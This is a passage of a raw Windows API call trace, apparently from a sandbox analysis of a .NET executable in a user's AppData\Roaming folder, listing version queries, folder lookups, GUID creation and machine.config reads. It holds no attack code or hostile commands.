lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x220909c, puLen=0x4debc4) returned 1 [0158.418] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x220920c, puLen=0x4debc4) returned 1 [0158.418] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x0, puLen=0x4debc4) returned 0 [0158.418] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x0, puLen=0x4debc4) returned 0 [0158.418] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x4debbc, puLen=0x4debb8 | out: lplpBuffer=0x4debbc*=0x2209044, puLen=0x4debb8) returned 1 [0158.418] VerLanguageNameW (in: wLang=0x0, szLang=0x4de94c, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0158.420] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\", lplpBuffer=0x4debcc, puLen=0x4debc8 | out: lplpBuffer=0x4debcc*=0x2208fd0, puLen=0x4debc8) returned 1 [0158.536] CoTaskMemAlloc (cb=0x20c) returned 0x7cc740 [0158.536] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7cc740 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0158.538] CoTaskMemFree (pv=0x7cc740) [0158.538] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x4de6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0158.538] CoTaskMemAlloc (cb=0x20c) returned 0x7cc740 [0158.538] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x7cc740 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0158.540] CoTaskMemFree (pv=0x7cc740) [0158.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x4de6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0158.546] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0xc1aa58d8, Data2=0xab8a, Data3=0x4985, Data4=([0]=0xbb, [1]=0x7d, [2]=0xb9, [3]=0x1c, [4]=0xd2, [5]=0x25, [6]=0xa1, [7]=0xae))) returned 0x0 [0158.546] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0x97d6e4e4, Data2=0xa601, Data3=0x442b, Data4=([0]=0x95, [1]=0xc8, [2]=0xcc, [3]=0xeb, [4]=0x94, [5]=0xf7, [6]=0x41, [7]=0xe9))) returned 0x0 [0158.546] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0x59fa2511, Data2=0x695b, Data3=0x4301, Data4=([0]=0x82, [1]=0x6c, [2]=0x26, [3]=0x86, [4]=0xc3, [5]=0x64, [6]=0x50, [7]=0x79))) returned 0x0 [0158.546] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0x9edafcd8, Data2=0x8664, Data3=0x4fbf, Data4=([0]=0xa6, [1]=0xbf, [2]=0xed, [3]=0xe, [4]=0xf7, [5]=0x5d, [6]=0xa1, [7]=0x91))) returned 0x0 [0158.546] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0x1db28461, Data2=0x5901, Data3=0x4368, Data4=([0]=0xa2, [1]=0xa9, [2]=0x8d, [3]=0x5c, [4]=0xc7, [5]=0x61, [6]=0xb, [7]=0x5e))) returned 0x0 [0158.546] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0x7c835dfe, Data2=0x7e56, Data3=0x43d0, Data4=([0]=0x83, [1]=0x32, [2]=0x72, [3]=0xe4, [4]=0xd6, [5]=0x38, [6]=0xaf, [7]=0xf0))) returned 0x0 [0158.546] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0xf62fa730, Data2=0x31e6, Data3=0x497c, Data4=([0]=0xba, [1]=0x17, [2]=0x4, [3]=0xb6, [4]=0xf7, [5]=0xaa, [6]=0xd4, [7]=0x89))) returned 0x0 [0158.546] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0x4e697c89, Data2=0xe89a, Data3=0x42a6, Data4=([0]=0xa5, [1]=0xf4, [2]=0x21, [3]=0x2a, [4]=0x51, [5]=0x1a, [6]=0xf3, [7]=0xf7))) returned 0x0 [0158.547] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0x23641765, Data2=0xe668, Data3=0x4fea, Data4=([0]=0x88, [1]=0xc3, [2]=0xc4, [3]=0x97, [4]=0xca, [5]=0x8d, [6]=0x34, [7]=0xdb))) returned 0x0 [0158.547] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0xf61f9ad9, Data2=0x2c05, Data3=0x4ad3, Data4=([0]=0x92, [1]=0x2e, [2]=0xea, [3]=0x63, [4]=0x5, [5]=0xf0, [6]=0x28, [7]=0xb6))) returned 0x0 [0158.547] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0x175aa5f0, Data2=0x901, Data3=0x4310, Data4=([0]=0xad, [1]=0x25, [2]=0xd3, [3]=0xb4, [4]=0x10, [5]=0x1, [6]=0x41, [7]=0x69))) returned 0x0 [0158.547] CoCreateGuid (in: pguid=0x4de4a4 | out: pguid=0x4de4a4*(Data1=0xa233ff50, Data2=0xa4d1, Data3=0x436a, Data4=([0]=0xa0, [1]=0x2e, [2]=0xec, [3]=0x2e, [4]=0x44, [5]=0x3e, [6]=0xef, [7]=0x36))) returned 0x0 [0158.551] CoCreateGuid (in: pguid=0x4de5c8 | out: pguid=0x4de5c8*(Data1=0x5c6bf6c, Data2=0xade2, Data3=0x41d5, Data4=([0]=0xb3, [1]=0xaf, [2]=0xa0, [3]=0x31, [4]=0xf9, [5]=0x2f, [6]=0x61, [7]=0x24))) returned 0x0 [0158.551] CoCreateGuid (in: pguid=0x4de5c8 | out: pguid=0x4de5c8*(Data1=0xad73a572, Data2=0x90c3, Data3=0x4fba, Data4=([0]=0x9d, [1]=0xac, [2]=0xaa, [3]=0xe1, [4]=0xcc, [5]=0x6c, [6]=0xa9, [7]=0xda))) returned 0x0 [0158.551] CoCreateGuid (in: pguid=0x4de5c8 | out: pguid=0x4de5c8*(Data1=0xb0ec9e7, Data2=0x5e66, Data3=0x490a, Data4=([0]=0x82, [1]=0x7a, [2]=0x19, [3]=0xeb, [4]=0x9a, [5]=0x3a, [6]=0xf6, [7]=0x8))) returned 0x0 [0158.650] GetCurrentProcess () returned 0xffffffff [0158.651] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4dea1c | out: TokenHandle=0x4dea1c*=0x270) returned 1 [0158.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x4de4fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0158.657] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x4dea1c | out: lpFileInformation=0x4dea1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0158.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x4de4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0158.658] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x4dea1c | out: lpFileInformation=0x4dea1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0158.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x4de454, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0158.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4de948) returned 1 [0158.659] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x274 [0158.660] GetFileType (hFile=0x274) returned 0x1 [0158.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4de944) returned 1 [0158.660] GetFileType (hFile=0x274) returned 0x1 [0158.668] GetFileSize (in: hFile=0x274, lpFileSizeHigh=0x4dea10 | out: lpFileSizeHigh=0x4dea10*=0x0) returned 0x8c8f [0158.669] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de9cc, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de9cc*=0x1000, lpOverlapped=0x0) returned 1 [0158.685] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de868, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de868*=0x1000, lpOverlapped=0x0) returned 1 [0158.687] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de71c, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de71c*=0x1000, lpOverlapped=0x0) returned 1 [0158.688] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de71c, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de71c*=0x1000, lpOverlapped=0x0) returned 1 [0158.688] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de71c, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de71c*=0x1000, lpOverlapped=0x0) returned 1 [0158.688] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de654, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de654*=0x1000, lpOverlapped=0x0) returned 1 [0158.693] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de7d0, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de7d0*=0x1000, lpOverlapped=0x0) returned 1 [0158.695] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de6e4, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de6e4*=0x1000, lpOverlapped=0x0) returned 1 [0158.695] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de6e4, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de6e4*=0xc8f, lpOverlapped=0x0) returned 1 [0158.695] ReadFile (in: hFile=0x274, lpBuffer=0x221e784, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de7a4, lpOverlapped=0x0 | out: lpBuffer=0x221e784*, lpNumberOfBytesRead=0x4de7a4*=0x0, lpOverlapped=0x0) returned 1 [0158.695] CloseHandle (hObject=0x274) returned 1 [0158.697] GetCurrentProcess () returned 0xffffffff [0158.697] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deb50 | out: TokenHandle=0x4deb50*=0x274) returned 1 [0158.697] GetCurrentProcess () returned 0xffffffff [0158.697] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deb50 | out: TokenHandle=0x4deb50*=0x268) returned 1 [0158.698] GetCurrentProcess () returned 0xffffffff [0158.698] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4dea1c | out: TokenHandle=0x4dea1c*=0x278) returned 1 [0158.698] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x4dea1c | out: lpFileInformation=0x4dea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.698] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", nBufferLength=0x105, lpBuffer=0x4de4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", lpFilePart=0x0) returned 0x43 [0158.698] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x4dea1c | out: lpFileInformation=0x4dea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.699] GetCurrentProcess () returned 0xffffffff [0158.699] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deb50 | out: TokenHandle=0x4deb50*=0x27c) returned 1 [0158.700] GetCurrentProcess () returned 0xffffffff [0158.700] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deb50 | out: TokenHandle=0x4deb50*=0x280) returned 1 [0158.701] GetCurrentProcess () returned 0xffffffff [0158.701] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deb54 | out: TokenHandle=0x4deb54*=0x284) returned 1 [0158.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x4de600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0158.701] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x4deb54 | out: lpFileInformation=0x4deb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0158.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x4de58c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0158.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4dea80) returned 1 [0158.702] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0158.702] GetFileType (hFile=0x288) returned 0x1 [0158.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4dea7c) returned 1 [0158.702] GetFileType (hFile=0x288) returned 0x1 [0158.702] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x4deb48 | out: lpFileSizeHigh=0x4deb48*=0x0) returned 0x8c8f [0158.702] ReadFile (in: hFile=0x288, lpBuffer=0x22371b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4deb04, lpOverlapped=0x0 | out: lpBuffer=0x22371b0*, lpNumberOfBytesRead=0x4deb04*=0x1000, lpOverlapped=0x0) returned 1 [0158.703] ReadFile (in: hFile=0x288, lpBuffer=0x22371b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de9a0, lpOverlapped=0x0 | out: lpBuffer=0x22371b0*, lpNumberOfBytesRead=0x4de9a0*=0x1000, lpOverlapped=0x0) returned 1 [0158.703] ReadFile (in: hFile=0x288, lpBuffer=0x22371b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de854, lpOverlapped=0x0 | out: lpBuffer=0x22371b0*, lpNumberOfBytesRead=0x4de854*=0x1000, lpOverlapped=0x0) returned 1 [0158.703] ReadFile (in: hFile=0x288, lpBuffer=0x22371b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de854, lpOverlapped=0x0 | out: lpBuffer=0x22371b0*, lpNumberOfBytesRead=0x4de854*=0x1000, lpOverlapped=0x0) returned 1 [0158.703] ReadFile (in: hFile=0x288, lpBuffer=0x22371b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de854, lpOverlapped=0x0 | out: lpBuffer=0x22371b0*, lpNumberOfBytesRead=0x4de854*=0x1000, lpOverlapped=0x0) returned 1 [0158.704] ReadFile (in: hFile=0x288, lpBuffer=0x22371b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4de78c, lpOverlapped=0x0 | out: lpBuffer=0x22371b0*, lpNumberOfBytesRead=0x4de78c*=0x1000, lpOverlapped=0x0) returned 1 [0158.704] CloseHandle (hObject=0x288) returned 1 [0158.704] GetCurrentProcess () returned 0xffffffff [0158.704] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deb10 | out: TokenHandle=0x4deb10*=0x288) returned 1 [0158.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", nBufferLength=0x105, lpBuffer=0x4de5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", lpFilePart=0x0) returned 0x43 [0158.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x4deb10 | out: lpFileInformation=0x4deb10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0158.705] GetCurrentProcess () returned 0xffffffff [0158.705] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4deacc | out: TokenHandle=0x4deacc*=0x28c) returned 1 [0158.705] GetCurrentProcess () returned 0xffffffff [0158.705] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4dea88 | out: TokenHandle=0x4dea88*=0x290) returned 1 [0158.706] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", nBufferLength=0x105, lpBuffer=0x4de63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", lpFilePart=0x0) returned 0x43 [0158.706] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", nBufferLength=0x105, lpBuffer=0x4de5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", lpFilePart=0x0) returned 0x43 [0158.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x4de644, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0158.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x4de5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0158.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x4de614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0158.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4dea74) returned 1 [0158.707] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe"), fInfoLevelId=0x0, lpFileInformation=0x4deaf0 | out: lpFileInformation=0x4deaf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x717ab990, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x717ab990, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x7181ddb0, ftLastWriteTime.dwHighDateTime=0x1d6a092, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0158.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4dea70) returned 1 [0158.707] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpdwHandle=0x4deb64 | out: lpdwHandle=0x4deb64) returned 0x6ac [0158.707] GetFileVersionInfoW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x2249ca4 | out: lpData=0x2249ca4) returned 1 [0158.707] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x4deb38, puLen=0x4deb34 | out: lplpBuffer=0x4deb38*=0x2249d40, puLen=0x4deb34) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249de0, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249e10, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249e44, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249e78, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249eac, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249f40, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249f70, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249fa8, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249d98, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x2249f08, puLen=0x4deab4) returned 1 [0158.708] VerQueryValueW (in: pBlock=0x2249ca4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x4deab8, puLen=0x4deab4 | out: lplpBuffer=0x4deab8*=0x0, puLen=0x4deab4) returned 0 [0158.708] VerQueryValueW (in: 